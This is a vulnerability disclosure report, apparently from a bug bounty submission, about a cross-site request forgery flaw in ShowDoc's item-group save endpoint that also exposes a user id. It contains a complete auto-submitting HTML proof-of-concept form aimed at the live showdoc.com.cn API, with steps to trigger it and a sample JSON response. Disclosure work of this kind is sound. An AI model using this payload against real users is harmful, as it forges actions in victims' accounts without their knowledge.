An attacker is able to create a new group for any item if users visit the attacker’s website. Furthermore, the user-id “uid” is also exposed via the JSON response.
We can bypass the CSRF Protection if we put our payload on an iframe or an HTML file and then send them to the victim.
Poc.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.showdoc.com.cn/server/index.php?s=/api/itemGroup/save" method="POST">
<input type="hidden" name="group_name" value="testcsrf" />
<input type="hidden" name="id" value="" />
<input type="hidden" name="item_ids" value="1704644990568304" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
1.Open the PoC.html
in any browser.
2.Now you can check that a new group named testcsrf
is created with the item that has id=1704644990568304
is added to that group.
Furthermore, the user id uid
is also exposed via the JSON response:
{"error_code":0,"data":{"id":"2002","uid":"359287","group_name":"testcsrf","item_ids":"1704644990568304","s_number":"0","created_at":"2021-11-21 12:10:25","updated_at":"2021-11-21 12:10:25"}}
You can check my video PoC here: PoC
This can result in the exposure of data or unintended code execution.